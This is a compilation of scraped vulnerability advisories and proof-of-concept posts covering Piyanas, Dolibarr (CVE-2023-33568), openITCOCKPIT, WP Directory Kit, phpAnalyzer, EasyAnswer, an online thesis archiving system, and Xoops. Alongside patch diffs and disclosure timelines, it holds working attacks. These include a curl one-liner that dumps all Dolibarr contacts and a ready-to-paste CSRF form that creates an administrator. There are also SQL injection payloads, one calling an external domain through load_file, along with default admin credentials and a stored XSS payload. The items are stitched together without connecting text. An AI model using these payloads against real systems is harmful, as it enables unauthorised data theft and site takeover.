Piyanas version 0.1 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : Piyanas v0.1 User Login Page CSRF Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://www.piyanassystem.com/                                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : /add_user.php[+] Use Payload : /admin/add_user.php[+]  http://127.0.0.1/piyanassystemcom/piyanasmember/admin/add_user.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Piyanas 0.1 Cross Site Request Forgery

An issue in Dolibarr v16.0.0 to v16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.

Vladimir had the opportunity to test the security of the Open Source CRM software Dolibarr during an intrusion test of a business tool.

> Dolibarr ERP CRM is a modern software package to manage your company or foundation’s activity (contacts, suppliers, invoices, orders, stocks, agenda, accounting, …). It is open source software (written in PHP) and designed for small and medium businesses, foundations and freelancers.
> 
> Ref: https://github.com/Dolibarr/dolibarr  

Our pentester discovered a **critical vulnerability** exploitable by an **unauthenticated attacker**. It provides access to a **competitor’s entire customer file,** prospects, suppliers, and potentially employee information if a contact file exists. Both public and private notes can also be retrieved. Very easy to exploit, it **affects Dolibarr 16.x versions**.

**EDIT (22/03/2023)** : Dolibarr version 16.0.5 fixes this vulnerability for v16. (https://github.com/Dolibarr/dolibarr/blob/16.0.5/ChangeLog#L34).

**EDIT2 (13/06/2023)** : CVE-2023-33568 assigned.

**Discovery of the vulnerability**

In order to perform tests on the software itself without impacting the client’s production, and having access to as much information as possible, the consultant created a local Dolibarr environment in the identified version.

The containerized image https://hub.docker.com/r/tuxgasy/dolibarr allows one to have a functional environment in minutes with Docker to start hunting for vulnerabilities. The tuxgasy/dolibarr:16 image was used to discover this vulnerability.

Without necessarily trying to delve too much into the details of the Dolibarr code base, the auditor simply listed all the PHP files accessible from the root of the web server in order to identify those which are accessible without authentication:

> **find . -type f -name “\*.php”**

One of the scripts thus accessible attracts attention because its response differs from the others:https://github.com/Dolibarr/dolibarr/blob/16.0.4/htdocs/public/ticket/ajax/ajax.php.

Reading the PHP code instructs us on the required parameters: **_action_** and **_email_**.

In particular, **_action_** must be equal to “**getContacts**“.

When all conditions are met, the following response is returned to the unauthenticated user:  
Dolibarr integrates some protections and checks that the variables sent by users do not contain suspicious patterns (XSS, SQL injections):

If the parameters have been protected in this way, the injections are therefore generally more complex to exploit.

We are therefore currently in the presence of unauthenticated access to the details of a contact, provided that the attacker knows the email address associated with it.

Digging deeper into the PHP code, the pentester lands on the SQL query called:

We can observe the use of the SQL LIKE operator: with a bit of luck the ‘**%**‘ character can be used to transform the query and make it return all the records!

All contact details are returned in a single request.

A sorting on a few fields demonstrates the interest of this vulnerability:

An attacker could access a **competitor’s entire customer file**, suppliers, and potentially employee information if a contact file exists. Both public and private notes can also be retrieved.

Attacker can get other information such as technical data about the database:

**Impact & PoC**

Dolibarr 16.x versions are affected. Version 17 disables access to this page by default, a specific Dolibarr option must be set for it to be accessible again.

The estimated CVSSv3 score is 7.5 (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N&version=3.1), however the nature of the data and the ease of exploitation make it **a critical vulnerability**.

Linux command to reproduce the vulnerability and display some arbitrary fields:

> **curl -sk ‘\[URI\_DOLIBARR\]/public/ticket/ajax/ajax.php?action=getContacts&email=%’ | jq -r ‘.contacts\[\] | {id, socname, poste, email, phone\_perso, phone\_pro, note\_public, note\_private}’**

**Recommendations**

Business tools as important as an ERP/CRM must be properly secured:

*   Open access to the Internet only if strictly necessary (prefer VPN access)
*   Only use the plugins useful for your use cases
*   Perform regular account reviews
*   Keep the various software components up to date
*   Ensure that your access policy is correctly implemented (password complexity, 2FA, …)
*   Implement, and maintain, a policy of least privilege
*   Perform regular penetration testing (regardless of application exposure)

✅ Many Dolibarr instances are exposed on the Internet: for those which are in version 16.x remember to upgrade quickly!

**Communication with the software publisher**

Dolibarr’s Coordinated Disclosure Process is documented at the following URL: https://github.com/Dolibarr/dolibarr/security/policy.

The firs answer was (very) fast. On the other hand, the Dolibarr ecosystem could gain in security by communicating in a clear and precise manner on the vulnerabilities discovered and fixed in a centralized place, such as the Github “Security Advisories”.

21/02/2023 : First email sent by Vladimir following the Dolibarr process

21/02/2023 : Response from developer Eldy validating the vulnerability and indicating that the feature in question will be disabled with Dolibarr 17

05/03/2023 : Dolibarr v17 released

14/03/2023 : Article published

CVE-2023-33568: Dolibarr : unauthenticated contacts database theft

Race Condition within a Thread in GitHub repository it-novum/openitcockpit prior to 4.6.5.

@@ -0,0 +1,90 @@

<?php

// Copyright (C) <2015> <it-novum GmbH>

//

// This file is dual licensed

//

// 1.

// This program is free software: you can redistribute it and/or modify

// it under the terms of the GNU General Public License as published by

// the Free Software Foundation, version 3 of the License.

//

// This program is distributed in the hope that it will be useful,

// but WITHOUT ANY WARRANTY; without even the implied warranty of

// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

// GNU General Public License for more details.

//

// You should have received a copy of the GNU General Public License

// along with this program. If not, see <http://www.gnu.org/licenses/>.

//

// 2.

// If you purchased an openITCOCKPIT Enterprise Edition you can use this file

// under the terms of the openITCOCKPIT Enterprise Edition license agreement.

// License agreement and license key will be shipped with the order

// confirmation.

  

declare(strict\_types=1);

  

use Migrations\\AbstractMigration;

  

/\*\*

\* Class UniqueIndexForIsUnique

\*

\* Created via:

\* oitc migrations create UniqueIndexForIsUnique

\*

\* Run migration:

\* oitc migrations migrate

\*

\*/

class UniqueIndexForIsUnique extends AbstractMigration {

/\*\*

\* Change Method.

\*

\* More information on this method is available here:

\* https://book.cakephp.org/phinx/0/en/migrations.html#the-change-method

\* @return void

\*/

public function change(): void {

  

if ($this\->hasTable('agentchecks')) {

$this\->table('agentchecks')

\->addIndex(

\[

'name',

\],

\['unique' => true\]

)

\->update();

}

  

if ($this\->hasTable('macros')) {

$this\->table('macros')

\->addIndex(

\[

'name',

\],

\['unique' => true\]

)

\->update();

}

  

if ($this\->hasTable('users')) {

$this\->table('users')

\->addIndex(

\[

'email',

\],

\['unique' => true\]

)

\->addIndex(

\[

'email',

'ldap\_dn'

\],

\['unique' => true\]

)

\->update();

}

  

}

}

CVE-2023-3218: ITC-3014 Add unique index to MySQL tables to avoid race condition #1517 · it-novum/openITCOCKPIT@2c2c243

The WP Directory Kit plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'ajax_admin' function in versions up to, and including, 1.2.3. This makes it possible for authenticated attackers with subscriber-level permissions or above to delete or change plugin settings, import demo data, delete Directory Kit related posts and terms, and install arbitrary plugins. A partial patch was introduced in version 1.2.0.

CVE-2023-2351: Changeset 2917413 for wpdirectorykit – WordPress Plugin Repository

The WP Directory Kit plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1.9 via the 'wdk_public_action' function. This allows unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.

Timestamp:

04/26/2023 04:45:29 PM (7 weeks ago)

listingthemes

Message:

**1.2.0**

*   Disable cluster on map
*   Fix in categories, field visibility configuration
*   Map infowindow improvements
*   WooCommerce compatibility improvements
*   Count issue fix in listings amanage dashboard
*   Layout improvements
*   Security improvements
*   Fixed Open Redirection
*   Fixed Cross-Site Request Forgery
*   Fixed file url issues
*   vendor libs update

File:

  

*   wpdirectorykit/trunk/vendor/Winter\_MVC/core/mvc\_loader.php (4 diffs)

**Legend:**

Unmodified

Added

Removed

*   **wpdirectorykit/trunk/vendor/Winter\_MVC/core/mvc\_loader.php**
    
    r2898501
    
    r2904689
    
     
    
    78
    
    78
    
            if(empty($this->plugin\_directory))
    
    79
    
    79
    
            {
    
    80
    
     
    
                $file = WINTER\_MVC\_PATH.'/../../application/helpers/'.ucfirst($filename).'.php';
    
    81
    
     
    
            }
    
    82
    
     
    
            else
    
    83
    
     
    
            {
    
    84
    
     
    
                $file = $this->plugin\_directory.'application/helpers/'.ucfirst($filename).'.php';
    
     
    
    80
    
                $file = WINTER\_MVC\_PATH.'/../../application/helpers/'.sanitize\_file\_name(ucfirst($filename)).'.php';
    
     
    
    81
    
            }
    
     
    
    82
    
            else
    
     
    
    83
    
            {
    
     
    
    84
    
                $file = $this->plugin\_directory.'application/helpers/'.sanitize\_file\_name(ucfirst($filename)).'.php';
    
    85
    
    85
    
            }
    
    86
    
    86
    
    …
    
    …
    
     
    
    93
    
    93
    
            if(empty($this->plugin\_directory))
    
    94
    
    94
    
            {
    
    95
    
     
    
                $file = WINTER\_MVC\_PATH.'/../../application/controllers/'.ucfirst($class).'.php';
    
    96
    
     
    
            }
    
    97
    
     
    
            else
    
    98
    
     
    
            {
    
    99
    
     
    
                $file = $this->plugin\_directory.'application/controllers/'.ucfirst($class).'.php';
    
     
    
    95
    
                $file = WINTER\_MVC\_PATH.'/../../application/controllers/'.sanitize\_file\_name(ucfirst($class)).'.php';
    
     
    
    96
    
            }
    
     
    
    97
    
            else
    
     
    
    98
    
            {
    
     
    
    99
    
                $file = $this->plugin\_directory.'application/controllers/'.sanitize\_file\_name(ucfirst($class)).'.php';
    
    100
    
    100
    
            }
    
    101
    
    101
    
    …
    
    …
    
     
    
    141
    
    141
    
        {
    
    142
    
    142
    
    143
    
     
    
            if(is\_child\_theme() && file\_exists(get\_stylesheet\_directory().'/wpdirectorykit/application/views/'.$view\_file.'.php'))
    
    144
    
     
    
            {
    
    145
    
     
    
                $file = get\_stylesheet\_directory().'/wpdirectorykit/application/views/'.$view\_file.'.php';
    
    146
    
     
    
            }
    
    147
    
     
    
            elseif(file\_exists(get\_template\_directory().'/wpdirectorykit/application/views/'.$view\_file.'.php'))
    
    148
    
     
    
            {
    
    149
    
     
    
                $file = get\_template\_directory().'/wpdirectorykit/application/views/'.$view\_file.'.php';
    
     
    
    143
    
            if(!empty($this->plugin\_directory)) {
    
     
    
    144
    
                $plugin = basename($this->plugin\_directory);
    
     
    
    145
    
            } else {
    
     
    
    146
    
                $plugin = basename( plugin\_dir\_path(  dirname( \_\_FILE\_\_ , 3 ) ) );
    
     
    
    147
    
            }
    
     
    
    148
    
     
    
    149
    
            if(is\_child\_theme() && file\_exists(get\_stylesheet\_directory().'/'.$plugin.'/application/views/'.$view\_file.'.php'))
    
     
    
    150
    
            {
    
     
    
    151
    
                $file = get\_stylesheet\_directory().'/'.$plugin.'/application/views/'.$view\_file.'.php';
    
     
    
    152
    
            }
    
     
    
    153
    
            elseif(file\_exists(get\_template\_directory().'/'.$plugin.'/application/views/'.$view\_file.'.php'))
    
     
    
    154
    
            {
    
     
    
    155
    
                $file = get\_template\_directory().'/'.$plugin.'/application/views/'.$view\_file.'.php';
    
    150
    
    156
    
            }
    
    151
    
    157
    
            elseif(empty($this->plugin\_directory))
    
    …
    
    …
    
     
    
    188
    
    194
    
    189
    
    195
    
        public function model($class)
    
    190
    
     
    
        {
    
     
    
    196
    
        { 
    
    191
    
    197
    
            if(empty($this->plugin\_directory))
    
    192
    
    198
    
            {
    
    193
    
     
    
                $file = WINTER\_MVC\_PATH.'/../../application/models/'.ucfirst($class).'.php';
    
    194
    
     
    
            }
    
    195
    
     
    
            else
    
    196
    
     
    
            {
    
    197
    
     
    
                $file = $this->plugin\_directory.'application/models/'.ucfirst($class).'.php';
    
     
    
    199
    
                $file = WINTER\_MVC\_PATH.'/../../application/models/'.sanitize\_file\_name(ucfirst($class)).'.php';
    
     
    
    200
    
            }
    
     
    
    201
    
            else
    
     
    
    202
    
            {
    
     
    
    203
    
                $file = $this->plugin\_directory.'application/models/'.sanitize\_file\_name(ucfirst($class)).'.php';
    
    198
    
    204
    
            }
    
    199
    
    205
    
           
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2023-2278: Changeset 2904689 for wpdirectorykit/trunk/vendor/Winter_MVC/core/mvc_loader.php – WordPress Plugin Repository

The WP Directory Kit plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.9. This is due to missing or incorrect nonce validation on the 'insert' function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.

Timestamp:

04/26/2023 04:45:29 PM (7 weeks ago)

listingthemes

Message:

**1.2.0**

*   Disable cluster on map
*   Fix in categories, field visibility configuration
*   Map infowindow improvements
*   WooCommerce compatibility improvements
*   Count issue fix in listings amanage dashboard
*   Layout improvements
*   Security improvements
*   Fixed Open Redirection
*   Fixed Cross-Site Request Forgery
*   Fixed file url issues
*   vendor libs update

File:

  

*   wpdirectorykit/trunk/application/controllers/Wdk\_resultitem.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **wpdirectorykit/trunk/application/controllers/Wdk\_resultitem.php**
    
    r2821684
    
    r2904689
    
     
    
    46
    
    46
    
            if($this->form->run($rules))
    
    47
    
    47
    
            {
    
     
    
    48
    
     
    
    49
    
                // Check \_wpnonce
    
     
    
    50
    
                check\_admin\_referer( 'wdk-resultitem-edit\_'.$id, '\_wpnonce' );
    
     
    
    51
    
    48
    
    52
    
                // Save procedure for basic data
    
    49
    
     
    
                $data = $this->resultitem\_m->prepare\_data($this->input->post(), $rules);
    
     
    
    53
    
                $data = $this->resultitem\_m->prepare\_data(wdk\_get\_post(), $rules);
    
    50
    
    54
    
    51
    
    55
    
                // Save standard wp post
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2023-2277: Changeset 2904689 for wpdirectorykit/trunk/application/controllers/Wdk_resultitem.php – WordPress Plugin Repository

phpAnalyzer version 2.0.4 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : phpAnalyzer v2.0.4 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/phpanalyzer-instagram-audit-report-tool/21933992                                       |  | # Dork      : "Copyright © phpAnalyzer.com. All rights reserved. Product by AltumCode"                                           |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use user & pass : admin[+] http://127.0.0.1/phpAnalyzer/adminGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

phpAnalyzer 2.0.4 Insecure Settings

EasyAnswer version 1.0.1 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : EasyAnswer version 1.0.1 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit)                                            |   
| # Vendor    : https://www.codester.com/items/40311/                                                                              |    
| # Dork      : "© 2022 Easy Answer All rights reserved."                                                                          |  
====================================================================================================================================

poc :

[+] infected file: admins-create.php

[+] Inside folder /admin/admins-create.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

 </i>Create Administrator</h2>  
                  </div>  
                </div>  
              </div>  
            </div>  
          </div>

                    <div class="row">  
            <div class="col-md-12 stretch-card">  
              <div class="card">

                              <div class="card-body">

                                <div id="messages">  
                                 </div>

                 <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data">  
                 <input type="hidden" id="submitform" name="submitform" value="1">

                                  <div class="form-group row">  
                      <label for="username" class="col-sm-2 col-form-label">Username:</label>  
                      <div class="col-sm-12">  
                        <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME">  
                      </div>  
                 </div>  
                 <div class="form-group row">  
                      <label for="password" class="col-sm-2 col-form-label">Password:</label>  
                      <div class="col-sm-12">  
                        <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD">  
                      </div>  
                 </div>

                                  <div class="form-group row">  
                      <label for="email" class="col-sm-2 col-form-label">E-Mail:</label>  
                      <div class="col-sm-12">  
                        <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS">  
                      </div>  
                 </div>

                                  <div class="row-spaces"></div>

                                  <p>  
                  <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button>  
                 </p>  
                </form>

                                              </div>  
             </div>  
            </div>  
           </div>

                           </div>

    Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

EasyAnswer 1.0.1 Cross Site Request Forgery

Online Thesis Archiving System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: OTAS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 06.12.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The password parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'was submitted in the password parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain. The application interacted with that domain, indicating thatthe injected SQL query was executed. The attacker can dump allinformation from thedatabase of this system, and then he can use it for dangerous andmalicious purposes!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: password (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')OR NOT 1404=1404-- Eotr    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:01:15:00

Online Thesis Archiving System 1.0 SQL Injection

Xoops CMS version 2.5.10 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Xoops CMS Version 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)# Date: 2023-06-12# Exploit Author: tmrswrr# Vendor Homepage: https://xoops.org/# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10# Version: 2.5.10# Tested : https://www.softaculous.com/apps/cms/Xoops--- Description ---1) Login admin panel and click Image Manager , choose Add Category : https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images2) Write your payload in the Category Name field and submit:Payload: <script>alert(1)</script>3) After click multiupload , when you move the mouse to the payload name, you will see the alert buttonhttps://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2

Tag

#php